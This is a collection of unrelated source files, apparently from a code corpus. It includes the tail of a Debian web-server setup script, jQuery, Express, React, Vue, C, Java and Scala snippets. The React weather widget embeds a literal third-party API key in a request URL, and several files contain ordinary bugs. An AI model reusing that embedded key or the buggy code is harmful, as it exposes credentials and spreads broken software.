done
while true
do
pretty_echo "Please provide a new FQDN (something like 'web1.mydomain.tld')"
read HOSTNAME_FQDN
if [ -n "${HOSTNAME_FQDN}" ]
then
break
fi
done
# remove all lines with localhost and the public IP from /etc/hosts
sed -i "/^${IP_ADDRESS}.*/d" /etc/hosts
sed -i "/^127\.0\..*/d" /etc/hosts
# Insert the correct values in the top of the /etc/hosts
sed -i "1i ${IP_ADDRESS} ${HOSTNAME_FQDN} ${HOSTNAME_NAME}" /etc/hosts
sed -i "1i 127.0.0.1 localhost.localdomain localhost" /etc/hosts
# Set up hostname
echo "${HOSTNAME_NAME}" > /etc/hostname
hostname -F /etc/hostname
else
break
fi
done
# MYSQL
if select_yes "Do you want to install MySQL server and client?"
then
# MYSQL-SERVER
if ! $(is_installed mysql-server)
then
while true
do
pretty_echo "Please provide a MySQL root password"
read MYSQL_ROOT_PASSWORD
if [ -z "${MYSQL_ROOT_PASSWORD}" ]
then
pretty_echo "Password cannot be empty!"
continue
fi
pretty_echo "Please type the MySQL root password again"
read MYSQL_ROOT_PASSWORD_2
if [ ! "${MYSQL_ROOT_PASSWORD}" = "${MYSQL_ROOT_PASSWORD_2}" ]
then
pretty_echo "The two entered passwords do not match"
continue
else
break
fi
done
echo "mysql-server mysql-server/root_password password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
echo "mysql-server mysql-server/root_password_again password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
apt-get -y install mysql-server
# Configure MYSQL
sed -i "{s/^key_buffer\s/key_buffer_size/g}" /etc/mysql/my.cnf
sed -i "{s/^myisam-recover\s/myisam-recover-options/g}" /etc/mysql/my.cnf
else
pretty_echo "MYSQL server already installed... nothing done"
fi
# MYSQL-CLIENT
if ! $(is_installed mysql-client)
then
apt-get -y install mysql-client
else
pretty_echo "MYSQL client already installed... nothing done"
fi
fi
# NGINX
if select_yes "Do you want to install NGINX reverse proxy web server?"
then
if ! $(is_installed nginx)
then
apt-get -y install nginx
# Configure NGINX for production
CPU_CORES=`grep "^processor" /proc/cpuinfo | wc -l`
sed -i "{s/# gzip on;/gzip on;/g}" /etc/nginx/nginx.conf
sed -i "{s/# gzip_/gzip_/g}" /etc/nginx/nginx.conf
sed -i "{s/# server_tokens off;/server_tokens off;/g}" /etc/nginx/nginx.conf
sed -i "/gzip_types/s/;/ image\/svg+xml;/" /etc/nginx/nginx.conf
sed -i "{s/^worker_processes.*/worker_processes ${CPU_CORES};/g}" /etc/nginx/nginx.conf
sed -i "{s/worker_connections.*/worker_connections 1024;/g}" /etc/nginx/nginx.conf
else
pretty_echo "NGINX already installed... nothing done"
fi
fi
# APACHE
if select_yes "Do you want to install APACHE web server?"
then
if ! $(is_installed apache2)
then
apt-get -y install apache2 libapache2-mod-fastcgi apache2-mpm-worker
# Configure APACHE for production
sed -i "{s/^NameVirtualHost.*/NameVirtualHost 127.0.0.1:8080/g}" /etc/apache2/ports.conf
sed -i "{s/^Listen.*/Listen 127.0.0.1:8080/g}" /etc/apache2/ports.conf
sed -i "{s/<VirtualHost.*/<VirtualHost 127.0.0.1:8080>/g}" /etc/apache2/sites-available/default
# Apache modules
a2enmod fastcgi actions alias rewrite
else
pretty_echo "APACHE already installed... nothing done"
fi
fi
# PHP-FPM
if select_yes "Do you want to install PHP-FPM?"
then
if ! $(is_installed php5-fpm)
then
apt-get -y install php5 php5-fpm php5-mcrypt
# Configure PHP-FPM
sed -i "{s/^;cgi\.fix_pathinfo=1/cgi.fix_pathinfo=0/g}" /etc/php5/fpm/php.ini
sed -i -e 's|^;*request_terminate_timeout.*|request_terminate_timeout = 600|' /etc/php5/fpm/pool.d/www.conf
sed -i "{s/;pm.max_requests =.*/pm.max_requests = 500/g}" /etc/php5/fpm/pool.d/www.conf
# PHP-MYSQL
if $(is_installed mysql-server)
then
if ! $(is_installed php5-mysql)
then
apt-get -y install php5-mysql
fi
# PHPMYADMIN
if select_yes "Do you want to install PHPMYADMIN"
then
if ! $(is_installed phpmyadmin)
then
AUTOGENERATED_PASS=`pwgen -c -1 20`
echo "phpmyadmin phpmyadmin/reconfigure-webserver multiselect apache2" | debconf-set-selections
echo "phpmyadmin phpmyadmin/dbconfig-install boolean true" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/admin-user string root" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/admin-pass password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/app-pass password ${AUTOGENERATED_PASS}" |debconf-set-selections
echo "phpmyadmin phpmyadmin/app-password-confirm password ${AUTOGENERATED_PASS}" | debconf-set-selections
apt-get -y install phpmyadmin
fi
fi
fi
fi
fi
# EXIM
if select_yes "Do you want to install Exim mail server?"
then
if ! $(is_installed exim4)
then
apt-get -y install exim4
fi
# Clean mail queue
[ -n "$(mailq)" ] && rm -f /var/spool/exim4/input/*
# Configuration
sed -i "{s/^dc_eximconfig_configtype=.*/dc_eximconfig_configtype='internet'/g}" /etc/exim4/update-exim4.conf.conf
sed -i "{s/^dc_other_hostnames=.*/dc_other_hostnames='${HOSTNAME_FQDN}; ${HOSTNAME_NAME}; localhost.localdomain; localhost'/g}" /etc/exim4/update-exim4.conf.conf
echo "${HOSTNAME_FQDN}" > /etc/mailname
fi
# SHOREWALL
if select_yes "Do you want to install Shorewall firewall?"
then
if ! $(is_installed shorewall)
then
apt-get -y install shorewall
fi
# Configuration
sed -i "{s/^startup=0$/startup=1/g}" /etc/default/shorewall
cp /usr/share/doc/shorewall/examples/one-interface/interfaces /etc/shorewall/interfaces
cp /usr/share/doc/shorewall/examples/one-interface/policy /etc/shorewall/policy
cp /usr/share/doc/shorewall/examples/one-interface/rules /etc/shorewall/rules
cp /usr/share/doc/shorewall/examples/one-interface/zones /etc/shorewall/zones
echo -e "\n# Custom rules\n" >> /etc/shorewall/rules
if $(is_installed nginx); then
echo "HTTP/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
if $(is_installed openssh-server); then
echo "SSH/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
if $(is_installed vsftp); then
echo "FTP/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
fi
# SSH KEY
if select_yes "Do you want to add a public key for SSH access?"
then
while true
do
pretty_echo "Please paste your public key here:"
read PUBKEY
if [ -n "${PUBKEY}" ]
then
mkdir -p /root/.ssh/
echo "${PUBKEY}" >> /root/.ssh/authorized_keys
chmod 660 /root/.ssh/authorized_keys
chmod 770 /root/.ssh
break
else
pretty_echo "Please specify a key"
fi
done
fi
# DOWNLOAD MANAGEMENT TOOLS
wget -q https://raw.githubusercontent.com/matteomattei/servermaintenance/master/Debian7/add_domain.sh && chmod 750 add_domain.sh
wget -q https://raw.githubusercontent.com/matteomattei/servermaintenance/master/Debian7/del_domain.sh && chmod 750 del_domain.sh
# RESTART SERVICES
pretty_echo "Restarting all services..."
if $(is_installed mysql-server); then
service mysql restart
fi
if $(is_installed php5-fpm); then
service php5-fpm restart
fi
if $(is_installed apache2); then
service apache2 restart
fi
if $(is_installed nginx); then
service nginx restart
fi
if $(is_installed exim4); then
service exim4 restart
fi
if $(is_installed shorewall); then
service shorewall restart
fi
pretty_echo "Installation complete. You should restart the server now"
if select_yes "Do you want to restart the server now?"
then
reboot
fi
exit 0
|
;
var index_info_ops = {
page_size: 10,
data: {},
init: function () {
this.eventBind();
Pagination.init($("#pageBar"), index_info_ops.pageChange);
},
click_delete: function (a) {
console.log(a);
},
pageChange: function (i) {
index_info_ops.createTableHtml(i);
Pagination.Page($(".ht-page"), i, index_info_ops.data.length, index_info_ops.page_size);
},
createTableHtml: function (page) {
var htmls = "";
if (index_info_ops.data.length < 0) {
return
}
htmls += '<div class="col-lg-12">';
htmls += '<table class="table table-bordered m-t">';
htmls += '<thead>';
htmls += '<tr>';
htmls += '<th>序号</th>';
htmls += '<th>id</th>';
htmls += '<th>文件名</th>';
htmls += '<th>地址</th>';
htmls += '<th>短连接</th>';
htmls += '<th>上传时间</th>';
htmls += '<th>删除</th>';
htmls += '</tr>';
htmls += '</thead>';
htmls += '<tbody>';
for (var i = page; (i < (page + index_info_ops.page_size) && (i < index_info_ops.data.length)); i++) {
var item = index_info_ops.data[i];
htmls += '<tr>' +
'<td>' + i + '</td>' +
'<td>' + item["id"] + '</td>' +
'<td>' + item["name"] + '</td>' +
'<td>' + item["path"] + '</td>' +
'<td>' + item["shortPath"] + '</td>' +
'<td>' + item["createAt"] + '</td>' +
'<td>' +
'<a class="m-l remove" href="javascript:void(0);" >' +
'<i class="fa fa-trash fa-lg" id="file_delete" attach="' + item["id"] + '"></i>' +
'</a>' +
'</td>' +
'</tr>';
}
htmls += '</tbody>';
htmls += '</table>';
htmls += '</div>';
$("#table").html(htmls);
// index_info_ops.eventDeleteBind();
},
// eventDeleteBind: function (id) {
// console.log("被点击了:" + id);
// $.ajax({
// url: '/api/file/delete/' + id,
// headers: {'Content-Type': 'application/json'},
// contentType: 'application/json;charset=UTF-8',
// type: JSON.stringify({'id': id}),
// dataType: 'json',
// success: function (res) {
// if (res['code'] == 1) {
// common_ops.alert("删除成功", function () {
// window.location.href = "/";
// });
// } else {
// if (res['code'] == 7777) {
// common_ops.alert("请重新登录", function () {
// window.location.href = "/login.html";
// });
// } else {
// common_ops.alert(res.msg, function () {
// });
// }
// }
// }
// });
// },
eventBind: function () {
$("#table").html("init ...");
$.ajax({
url: '/api/file/obtain',
headers: {'Content-Type': 'application/json'},
contentType: 'application/json;charset=UTF-8',
type: 'GET',
dataType: 'json',
success: function (res) {
if (res['code'] == 1) {
if (res['result'].length == 0) {
$("#table").html("没有视频");
} else {
index_info_ops.data = res['result'];
/*
* 初始化插件
* @param object:翻页容器对象
* @param function:回调函数
* */
index_info_ops.createTableHtml(0);
Pagination.Page($("#pageBar"), 0, res['result'].length, index_info_ops.page_size);
}
} else {
if (res['code'] == 7777) {
common_ops.alert("请重新登录", function () {
window.location.href = "/login.html";
});
} else {
$("#table").html(res['msg']);
}
}
}
})
}
};
$(document).ready(function () {
index_info_ops.init();
$(document).on("click", "#file_delete", function () {
var id = $(this).attr("attach");
common_ops.alert("确定删除?", function () {
$.ajax({
url: '/api/file/delete/' + id,
headers: {'Content-Type': 'application/json'},
contentType: 'application/json;charset=UTF-8',
type: "GET",
dataType: 'json',
success: function (res) {
if (res['code'] == 1) {
common_ops.alert("删除成功", function () {
index_nav_ops.info();
});
} else {
if (res['code'] == 7777) {
common_ops.alert("请重新登录", function () {
window.location.href = "/login.html";
});
} else {
common_ops.alert(res.msg, function () {
});
}
}
},
error: function (e) {
console.log(e)
}
});
});
});
});
// eventDeleteBind = function (id) {
// console.log("被点击了:" + id);
// $.ajax({
// url: '/api/file/delete/' + id,
// headers: {'Content-Type': 'application/json'},
// contentType: 'application/json;charset=UTF-8',
// type: JSON.stringify({'id': id}),
// dataType: 'json',
// success: function (res) {
// if (res['code'] == 1) {
// common_ops.alert("删除成功", function () {
// window.location.href = "/";
// });
// } else {
// if (res['code'] == 7777) {
// common_ops.alert("请重新登录", function () {
// window.location.href = "/login.html";
// });
// } else {
// common_ops.alert(res.msg, function () {
// });
// }
// }
// }
// });
// }; |
<gh_stars>0
const router = require('express').Router()
const {Recipe, Cuisine, Course} = require('../../db/models')
module.exports = router
router.get('/', async (req, res, next) => {
try {
let recipes = await Recipe.findAll()
res.json(recipes)
} catch (error) {
console.log(error)
}
})
router.get('/:recipeId', async (req, res, next) => {
try {
console.log('-----------id---------', req.params.recipeId)
const recipe = await Recipe.findByPk(req.params.recipeId, {
include: [Cuisine, Course]
})
console.log('------------RECIPE-----------', recipe)
if (recipe) {
res.json(recipe)
} else {
res.sendStatus(404)
}
} catch (error) {
console.log(error)
}
})
|
import React from 'react';
import axios from 'axios';
import callApi from './apiUtils';
import Skycons from 'react-skycons';
class Weather extends React.Component {
constructor() {
super();
this.state = {
data : [],
city : "",
state : "",
lat : 0,
long : 0,
temp : 0,
icon : "",
humidity : 0,
dewpoint : 0,
visibility : "",
loading : true,
error : null
};
this._formatIcon = this._formatIcon.bind(this);
this._onSuccess = this._onSuccess.bind(this);
this._onFailure = this._onFailure.bind(this);
}
_formatIcon(icon) {
switch (icon) {
case "clear-day":
icon = "CLEAR_DAY";
break;
case "clear-night":
icon = "CLEAR_NIGHT";
break;
case "partly-cloudy-day":
icon = "PARTLY_CLOUDY_DAY";
break;
case "partly-cloudy-night":
icon = "PARTLY_CLOUDY_NIGHT";
break;
case "cloudy":
icon = "CLOUDY";
break;
case "rain":
icon = "RAIN";
break;
case "sleet":
icon = "SLEET";
break;
case "snow":
icon = "SNOW";
break;
case "wind":
icon = "WIND";
break;
case "fog":
icon = "FOG";
break;
default :
icon = "CLEAR_DAY";
break;
}
return icon;
}
_onSuccess(res) {
let data = res,
hourly = [],
temp = Math.round(res.currently.apparentTemperature) + '°',
icon = res.currently.icon,
humidity = Math.round(res.currently.humidity * 10) + '%',
dewpoint = Math.round(res.currently.dewPoint) + '°',
visibility = Math.round(res.currently.visibility * 0.621371) + ' miles',
wind = Math.round(res.currently.windSpeed * 2.23694) + ' MPH';
// Get hourly forecast
for(var i = 1; i < 4; i++) {
hourly[i] = {
time : new Date(1000 * res.hourly.data[i].time).getHours(),
temp : Math.round(res.hourly.data[i].temperature) + '°',
icon : res.hourly.data[i].icon
};
// Convert Icon names to the correct format
hourly[i].icon = this._formatIcon(icon);
// Append AM or PM to forecast times
hourly[i].time < 12 ? (hourly[i].time = hourly[i].time + " AM") : (hourly[i].time -= 12, hourly[i].time = hourly[i].time + " PM");
// format time
if (hourly[i].time === "0 AM") {
hourly[i].time = 12 + " AM";
} else if (hourly[i].time === "0 PM") {
hourly[i].time = 12 + " PM";
}
}
// Convert Icon names to the correct format
icon = this._formatIcon(icon);
// Update state to trigger a re-render.
// Clear any errors, and turn off the loading indiciator.
this.setState({
data,
temp,
icon,
humidity,
dewpoint,
visibility,
wind,
hourly,
loading : false,
error : null
});
}
_onFailure(error) {
let err = error;
this.setState({
loading : false,
error : err
});
}
_getWeather() {
axios.get("http://api.ipinfodb.com/v3/ip-city/?key=86be52d35c2a9476eae382805a6161756a0b2fd47514dcb31121e889bf4c53b5&format=json")
.then(res => {
let lat = res.data.latitude,
long = res.data.longitude,
city = res.data.cityName,
state = res.data.regionName;
// Update state to trigger a re-render.
// Clear any errors, and turn off the loading indiciator.
this.setState({
lat,
long,
city,
state
}, function(){
const url = `http://localhost:3000/api/darksky?latitude=${this.state.lat}&longitude=${this.state.long}`;
callApi(url, null, this._onSuccess, this._onFailure);
});
})
.catch(err => {
// Something went wrong. Save the error in state and re-render.
this.setState({
loading : false,
error : err
});
});
}
_forecast() {
if(this.state.error) {
return this._renderError();
}
return (
<div className="weather__container">
<div className="forecast">
<div className="forecast__header">
{this.state.city}, {this.state.state}
</div>
<div className="forecast__icon">
<Skycons color='white' icon={this.state.icon} autoplay={true} />
</div>
<div className="forecast__temp">
{this.state.temp}
</div>
</div>
<div className="weather__stats">
<ul className="weather__stats--list">
<li>
<span>Humidity</span>
<span>{this.state.humidity}</span>
</li>
<li>
<span>Wind</span>
<span>{this.state.wind}</span>
</li>
<li>
<span>Dewpoint</span>
<span>{this.state.dewpoint}</span>
</li>
<li>
<span>Visibility</span>
<span>{this.state.visibility}</span>
</li>
</ul>
<div className="weather__stats--forecast">
{this.state.hourly.map(hour =>
<div className="weather__stats--forecast-hour">
<span className="hour">{hour.time}</span>
<span className="icon">
<Skycons color='white' icon={hour.icon} autoplay={true} />
</span>
<span className="temp">{hour.temp}</span>
</div>
)}
</div>
</div>
</div>
);
}
_renderLoading() {
return <div className="loading">Loading...</div>;
}
_renderError() {
return (
<div className="error">
Uh oh: {this.state.error.message}
</div>
);
}
componentWillMount() {
this._getWeather();
}
componentDidMount() {
let weatherUpdate = setInterval(() => {
this._getWeather();
}, 120000);
}
componentWillUnmount() {
clearInterval(weatherUpdate);
}
render() {
return (
<div className="weather">
{this.state.loading ? this._renderLoading() : this._forecast() }
</div>
);
}
};
export default Weather; |
import Meta from 'vue-meta'
import VueRouter from 'vue-router'
import Vuex from 'vuex'
import compA from './vue/_template'
// 通常
Vue.component('comp-a', compA)
/**
* ルーター導入
* Usage: npm i -D vue-router
*/
Vue.use(VueRouter)
/**
* ストア導入
* Usage: npm i -D vuex
*/
Vue.use(Vuex)
/**
* Metaの導入
* Usage: npm i -D vue-meta
*/
Vue.use(Meta)
const apps = new Vue({
// ルーター
router: {
mode: 'history',
routes: [
{
path: '',
components: { flogAbc }
}
],
scrollBehavior (to, from, savedPosition) {
return { x: 0, y: 0 }
}
},
// ストア
store: new Vuex.store({
modules: {}
}),
// @see: https://github.com/declandewet/vue-meta
metaInfo: {
titleTemplate: (chunk) => {
return chunk ? `${chunk} | hoge` : 'hoge'
}
}
})
// const apps = new Vue()
apps.$mount('#apps') |
/**
* The type of header being used.
*/
export enum HeaderType {
None,
Text,
Select
} |
#!/bin/bash
mkdir -p "$PREFIX/bin"
if [ "$(uname)" == "Darwin" ]; then
cp chainToPsl "$PREFIX/bin"
else
export MACHTYPE=x86_64
export BINDIR=$(pwd)/bin
mkdir -p "$BINDIR"
(cd kent/src/lib && make)
(cd kent/src/htslib && make)
(cd kent/src/jkOwnLib && make)
(cd kent/src/hg/lib && make)
(cd kent/src/hg/mouseStuff/chainToPsl && make)
cp bin/chainToPsl "$PREFIX/bin"
fi
chmod +x "$PREFIX/bin/chainToPsl"
|
<filename>chap02/endian_test.c
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wformat"
#pragma clang diagnostic ignored "-Wunknown-pragmas"
#pragma ide diagnostic ignored "UnreachableCode"
/*
* endian_test.c (c) 2018-20 <NAME>
*/
#include <stdio.h>
#include <stdint.h>
int main() {
uint64_t sonde = 0x0123456789ABCDEF;
uint8_t lsb = sonde & 0xFF;
uint8_t *bytes = (uint8_t *)&sonde;
printf("Value 0x%lx is at address %p\n", sonde, &sonde);
for (int i = sizeof(sonde) - 1; i >= 0; i--) {
printf("\t%p: %02x\n", bytes + i, bytes[i]);
}
printf("Based on the location of the least significant byte, your processor is ");
if (lsb == bytes[0]) {
printf("little endian.\n");
} else if (lsb == bytes[sizeof(sonde) - 1]) {
printf("big endian.\n");
} else {
printf("neither big- nor little endian, perhaps multibyte-swapped little endian.\n");
}
printf("Based on the pre-defined macros, your processor is ");
int byte_order = __BYTE_ORDER__;
switch (byte_order) {
case __ORDER_LITTLE_ENDIAN__:
printf("little endian.\n");
break;
case __ORDER_BIG_ENDIAN__:
printf("big endian.\n");
break;
case __ORDER_PDP_ENDIAN__:
printf("16bit-swapped little endian.\n");
break;
default:
printf("neither big- nor little- nor pdp-endian.\n");
}
}
#pragma clang diagnostic pop
|
/*
* Module : firefox/firefox-injected-compute.js
* Copyright : (c) 2011-2012, Galois, Inc.
*
* Maintainer :
* Stability : Provisional
* Portability: Not Portable (Firefox only)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @param {!string} css The css to inject.
*/
var addGlobalStyle = function(css) {
var head = document.getElementsByTagName('head')[0]; // find head element, which should exist
if (!head) {
head = document.createElement('head');
// XXX this is perhaps not reliable?
document.body.appendChild(head);
}
var style = document.createElement('style'); // create <style> element
style.type = 'text/css';
if (style.styleSheet) { // for some cross-browser problem
style.styleSheet.cssText = css; // attach CSS text to style elt
} else {
style.appendChild(document.createTextNode(css)); // attach CSS text to style elt
}
head.appendChild(style); // attach style element to head
};
/**
* @return {{on: function(!string, function(*)), emit: function(!string, *)}}
*/
var obtainComputePort = function() {
var port = self.port;
port.on('injectCSS', addGlobalStyle);
return self.port;
};
|
/*
Jameleon - An automation testing tool..
Copyright (C) 2006 <NAME> (<EMAIL>)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
package net.sf.jameleon.ant;
import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.apache.tools.ant.BuildException;
import org.apache.tools.ant.Task;
import org.apache.tools.ant.types.Parameter;
import net.sf.jameleon.util.GenSyntaxReference;
/**
* An Ant task that takes the registered FunctionalPoints and generates a syntax reference for each one.
*/
public class GenSyntaxReferenceTask extends Task{
protected File outputFile;
protected String plugin = "TestCaseTagDefs";
protected String templateName = "syntaxReference.txt";
protected List parameters;
public GenSyntaxReferenceTask(){
parameters = new ArrayList();
}
/**
* Adds a template parameter to be passed to the Velocity template
*
* @param parameter a name/value parameter.
*/
public void addTemplateParam(Parameter parameter){
parameters.add(parameter);
}
/**
* Sets the name of the file, not including path of the template to use. Defaults to 'syntaxReference.txt'.
* @param templateName - the name of the file, not including path of the template to use.
* NOTE: This fileName is loaded from the CLASSPATH.
*/
public void setTemplateName(String templateName){
this.templateName = templateName;
}
/**
* Sets the plugin to generate the syntax reference from. Defaults to TestCaseTagDefs
* @param plugin - the plugin to generate the syntax reference from. For the htmlunit-plugin, pass in 'htmlunit-plugin'.
*/
public void setPlugin(String plugin){
this.plugin = plugin;
}
/**
* Set the file where the syntax reference will be generated.
* @param fileName - The name of the file.
*/
public void setOutputFile(File fileName){
outputFile = fileName;
}
/**
* Jameleon's implementation of Task.execute().
*
* @exception BuildException Ant's way of reporting exception
*/
public final void execute() throws BuildException {
if (outputFile == null) {
outputFile = new File(getProject().getBaseDir(), "xdocs/syntax-reference.xml");
}
if (plugin == null) {
throw new BuildException("plugin must be set!");
}
Map params = new HashMap();
GenSyntaxReference generator = new GenSyntaxReference();
if (parameters != null) {
Iterator it = parameters.iterator();
Parameter param;
while (it.hasNext()) {
param = (Parameter)it.next();
params.put(param.getName(), param.getValue());
}
}
try{
System.out.println("Generating "+outputFile.getAbsolutePath());
generator.genReferenceForPlugin(plugin, templateName, outputFile, params);
}catch(Exception e){
e.printStackTrace();
throw new BuildException("An error occured while generating the syntax reference file: "+e.getMessage(), e);
}
}
}
|
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package org.fhwa.c2cri.testprocedures.ntcip2306;
import java.sql.ResultSet;
import java.util.ArrayList;
import tmddv3verification.utilities.TMDDDatabase;
/**
*
* @author TransCore ITS
*/
public class NTCIP2306Specifications {
private ArrayList<NTCIP2306Specification> SpecificationsList = new ArrayList<NTCIP2306Specification>();
private static NTCIP2306Specifications ntcip2306_nrtm_RTM_Spec;
public static NTCIP2306Specifications getInstance() {
if (ntcip2306_nrtm_RTM_Spec == null) {
ntcip2306_nrtm_RTM_Spec = new NTCIP2306Specifications();
}
return ntcip2306_nrtm_RTM_Spec;
}
private NTCIP2306Specifications() {
TMDDDatabase theDatabase = new TMDDDatabase();
theDatabase.connectToDatabase();
ResultSet wSDLStepDescriptionRS = theDatabase.queryReturnRS("SELECT * FROM NTCIP2306ProcedureDetailsUpdatedTable "
+ "WHERE (Mandatory='T')");
// "WHERE ((Mandatory='T') AND(InStr([PrimaryTarget],'WSDL')>0))");
try {
while (wSDLStepDescriptionRS.next()) {
String rqmtID = wSDLStepDescriptionRS.getString("RqmtID");
String requirementDescription = wSDLStepDescriptionRS.getString("requirementDescription");
String section = wSDLStepDescriptionRS.getString("Section");
String prlTraceID = wSDLStepDescriptionRS.getString("2306PRLTraceID");
String profile = wSDLStepDescriptionRS.getString("Profile");
String mandatory = wSDLStepDescriptionRS.getString("Mandatory");
String primaryTarget = wSDLStepDescriptionRS.getString("PrimaryTarget");
String verificationTime = wSDLStepDescriptionRS.getString("VerificationTime");
String verificationApproach = wSDLStepDescriptionRS.getString("VerificationApproach");
String preconditionAssertion = wSDLStepDescriptionRS.getString("PreconditionAssertion");
String testSteps = wSDLStepDescriptionRS.getString("TestSteps");
String subRequirements = wSDLStepDescriptionRS.getString("SubRequirements");
String scriptText = wSDLStepDescriptionRS.getString("ScriptText");
String xPathText = wSDLStepDescriptionRS.getString("XPathText");
String xslTarget = wSDLStepDescriptionRS.getString("XSLTarget");
String xslPredicate = wSDLStepDescriptionRS.getString("XSLPredicate");
NTCIP2306Specification thisWSDLStepDescription = new NTCIP2306Specification();
thisWSDLStepDescription.setRqmtID(rqmtID);
thisWSDLStepDescription.setRequirementDescription(requirementDescription);
thisWSDLStepDescription.setSection(section);
thisWSDLStepDescription.setpRLTraceID(prlTraceID);
thisWSDLStepDescription.setProfile(profile);
thisWSDLStepDescription.setMandatory(mandatory);
thisWSDLStepDescription.setPrimaryTarget(primaryTarget);
thisWSDLStepDescription.setVerificationTime(verificationTime);
thisWSDLStepDescription.setVerificationApproach(verificationApproach);
thisWSDLStepDescription.setPreconditionAssertion(preconditionAssertion);
thisWSDLStepDescription.setTestSteps(testSteps);
thisWSDLStepDescription.setSubRequirments(subRequirements);
thisWSDLStepDescription.setScriptText(scriptText);
thisWSDLStepDescription.setxPathText(xPathText);
thisWSDLStepDescription.setXslTarget(xslTarget);
thisWSDLStepDescription.setXslPredicate(xslPredicate);
SpecificationsList.add(thisWSDLStepDescription);
}
wSDLStepDescriptionRS.close();
wSDLStepDescriptionRS = null;
} catch (Exception ex) {
ex.printStackTrace();
}
theDatabase.disconnectFromDatabase();
// TODO code application logic here
System.out.println("Number of WSDL Step Descriptions Added = " + SpecificationsList.size());
}
public ArrayList<NTCIP2306Specification> getProfileSpecifications(String profile, String target) {
ArrayList<NTCIP2306Specification> returnList = new ArrayList<NTCIP2306Specification>();
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getProfile() != null) && thisStepDescription.getProfile().equals(profile)) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(target)) {
returnList.add(thisStepDescription);
}
}
}
return returnList;
}
public ArrayList<String> getWSDLRequirements() {
ArrayList<String> returnList = new ArrayList<String>();
//There's only one procedure for WSDL so send back all requirements
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
returnList.add(thisStepDescription.getRqmtID());
}
}
return returnList;
}
public ArrayList<NTCIP2306Specification> getWSDLSpecifications() {
ArrayList<NTCIP2306Specification> returnList = new ArrayList<NTCIP2306Specification>();
//There's only one procedure for WSDL so send back all requirements
for (NTCIP2306Specification thisSpecification : SpecificationsList) {
if ((thisSpecification.getPrimaryTarget() != null) && thisSpecification.getPrimaryTarget().contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
returnList.add(thisSpecification);
}
}
return returnList;
}
public ArrayList<String> getRequirements(String target, String profile, String centerMode) {
ArrayList<String> returnList = new ArrayList<String>();
//There's only one procedure for WSDL so send back all requirements
if (target.contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(target)) {
returnList.add(thisStepDescription.getRqmtID());
}
}
}
return returnList;
}
public static void main(String[] args) {
// Test Out this Class
ArrayList<NTCIP2306Specification> responseList;
NTCIP2306Specifications firstOne = new NTCIP2306Specifications();
System.out.println("Sent General, WSDL");
responseList = firstOne.getProfileSpecifications("General", "WSDL");
printResult(responseList);
responseList.clear();
System.out.println("Sent General, Message");
responseList = firstOne.getProfileSpecifications("General", "Message");
printResult(responseList);
responseList.clear();
System.out.println("Sent SOAP,WSDL");
responseList = firstOne.getProfileSpecifications("SOAP", "WSDL");
printResult(responseList);
responseList.clear();
}
public static void printResult(ArrayList<NTCIP2306Specification> reportList) {
if (reportList.size() == 0) {
System.out.println("Nothing returned!!");
} else {
for (NTCIP2306Specification thisWSDLStep : reportList) {
System.out.println("Returned " + thisWSDLStep.getRqmtID());
}
}
}
}
|
/* - Coeus web framework -------------------------
*
* Licensed under the Apache License, Version 2.0.
*
* Author: <NAME>
*/
package com.tzavellas.coeus.validation.bean
import java.util.Locale
import org.junit.Test
import org.junit.Assert._
import com.tzavellas.coeus.bind.{ BindingResult, Error }
import com.tzavellas.coeus.i18n.msg.MessageBundle
class BeanErrorFormatterTest {
@Test
def binding_errors_are_resolved_using_the_message_bundle() {
val notInt = Error.typeMismatch("age", classOf[Int], "five")
assertEquals("Not an Int", format(notInt))
}
@Test
def validation_errors_are_already_formatted_by_the_jsr303_impl() {
val error = Error("the error message")
assertEquals("the error message", format(error))
}
def format(error: Error) = BeanErrorFormatter.format(error, null, messages, null)
object messages extends MessageBundle {
val msgs = Map("int.type-mismatch" -> "Not an Int")
def apply(locale: Locale, code: String, args: Any*) = msgs.apply(code)
def get(locale: Locale, code: String, args: Any*) = msgs.get(code)
}
}
|
// JavaScript program for calculating the Fibonacci number of a given index
function fibonacci(n) {
let memo = [0, 1];
let fib = n => {
if (memo[n] != null) return memo[n];
return memo[n] = fib(n-1) + fib(n-2);
};
return fib(n);
} |
